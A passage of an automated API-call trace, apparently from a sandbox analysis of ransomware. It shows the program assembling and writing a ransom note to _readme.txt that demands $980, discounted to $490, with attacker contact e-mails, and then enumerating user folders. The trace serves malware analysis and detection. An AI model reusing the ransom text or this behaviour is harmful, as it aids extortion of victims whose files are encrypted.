us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.802] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.802] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b1a750 [0165.802] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x660 [0165.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8c0) returned 0x3b40090 [0165.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x858) returned 0x3b4cb78 [0165.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b4cb78, cbMultiByte=2136, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 1113 [0165.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b4d3d8 [0165.803] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 1112 [0165.803] WriteFile (in: hFile=0x660, lpBuffer=0x3b4d3d8*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0x401fb64, lpOverlapped=0x0 | out: lpBuffer=0x3b4d3d8*, lpNumberOfBytesWritten=0x401fb64*=0x458, lpOverlapped=0x0) returned 1 [0165.804] CloseHandle (hObject=0x660) returned 1 [0165.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4d3d8 | out: hHeap=0xcd0000) returned 1 [0165.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e70 | out: hHeap=0xcd0000) returned 1 [0165.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b411d0 [0165.804] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x19d49ca0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x19d49ca0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b411d0 | out: hHeap=0xcd0000) returned 1 [0165.804] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x19d49ca0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x19d49ca0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.805] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0165.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c558 [0165.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c500 [0165.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c200 [0165.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c4a8 [0165.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c500 | out: hHeap=0xcd0000) returned 1 [0165.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c558 | out: hHeap=0xcd0000) returned 1 [0165.805] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0165.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71930 [0165.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0165.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x38) returned 0x362b8e0 [0165.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c558 [0165.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c4a8 | out: hHeap=0xcd0000) returned 1 [0165.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c200 | out: hHeap=0xcd0000) returned 1 [0165.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a68 [0165.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0165.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71930 | out: hHeap=0xcd0000) returned 1 [0165.805] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0165.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c4a8 [0165.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c500 [0165.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x54) returned 0x3613610 [0165.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c3f8 [0165.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71930 [0165.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c558 | out: hHeap=0xcd0000) returned 1 [0165.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a68 | out: hHeap=0xcd0000) returned 1 [0165.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362b8e0 | out: hHeap=0xcd0000) returned 1 [0165.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c558 [0165.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c500 | out: hHeap=0xcd0000) returned 1 [0165.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c4a8 | out: hHeap=0xcd0000) returned 1 [0165.805] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0165.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c4a8 [0165.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c500 [0165.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0165.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c660 [0165.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a68 [0165.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c6b8 [0165.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c3f8 | out: hHeap=0xcd0000) returned 1 [0165.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71930 | out: hHeap=0xcd0000) returned 1 [0165.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c558 | out: hHeap=0xcd0000) returned 1 [0165.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0165.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c558 [0165.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c500 | out: hHeap=0xcd0000) returned 1 [0165.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c4a8 | out: hHeap=0xcd0000) returned 1 [0165.806] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe8a11780, ftLastAccessTime.dwHighDateTime=0x1d69ad4, ftLastWriteTime.dwLowDateTime=0xe8a11780, ftLastWriteTime.dwHighDateTime=0x1d69ad4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0165.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c4a8 [0165.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c500 [0165.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa8) returned 0x35e3280 [0165.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c3f8 [0165.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71930 [0165.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c710 [0165.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c768 [0165.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c660 | out: hHeap=0xcd0000) returned 1 [0165.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a68 | out: hHeap=0xcd0000) returned 1 [0165.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c6b8 | out: hHeap=0xcd0000) returned 1 [0165.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c558 | out: hHeap=0xcd0000) returned 1 [0165.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0165.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c558 [0165.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c500 | out: hHeap=0xcd0000) returned 1 [0165.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c4a8 | out: hHeap=0xcd0000) returned 1 [0165.806] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9758dc0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9758dc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0165.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c4a8 [0165.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x76) returned 0xd34a78 [0165.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c4a8 | out: hHeap=0xcd0000) returned 1 [0165.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a68 [0165.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0165.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a68 | out: hHeap=0xcd0000) returned 1 [0165.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd34a78 | out: hHeap=0xcd0000) returned 1 [0165.806] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0165.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c4a8 [0165.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x76) returned 0xd34a78 [0165.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c4a8 | out: hHeap=0xcd0000) returned 1 [0165.807] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a68 [0165.807] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xfc) returned 0xd57fe0 [0165.807] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c4a8 [0165.807] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ad0 [0165.807] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c500 [0165.807] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c6b8 [0165.807] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c660 [0165.807] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0165.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c3f8 | out: hHeap=0xcd0000) returned 1 [0165.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71930 | out: hHeap=0xcd0000) returned 1 [0165.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c710 | out: hHeap=0xcd0000) returned 1 [0165.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c768 | out: hHeap=0xcd0000) returned 1 [0165.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c558 | out: hHeap=0xcd0000) returned 1 [0165.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0165.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e3280 | out: hHeap=0xcd0000) returned 1 [0165.807] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0165.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a68 | out: hHeap=0xcd0000) returned 1 [0165.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd34a78 | out: hHeap=0xcd0000) returned 1 [0165.807] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0165.807] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c558 [0165.807] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x76) returned 0xd34a78 [0165.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c558 | out: hHeap=0xcd0000) returned 1 [0165.807] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a68 [0165.807] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71930 [0165.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a68 | out: hHeap=0xcd0000) returned 1 [0165.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd34a78 | out: hHeap=0xcd0000) returned 1 [0165.807] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0165.807] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c558 [0165.807] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c768 [0165.807] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c710 [0165.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c768 | out: hHeap=0xcd0000) returned 1 [0165.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c558 | out: hHeap=0xcd0000) returned 1 [0165.808] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0165.808] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a68 [0165.808] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ba0 [0165.808] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x16c) returned 0x3b424b0 [0165.808] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c558 [0165.808] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b44e88 [0165.808] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c768 [0165.808] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c3f8 [0165.808] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c7c0 [0165.808] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b44ef0 [0165.808] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b44f58 [0165.808] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b44fc0 [0165.808] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c818 [0165.808] 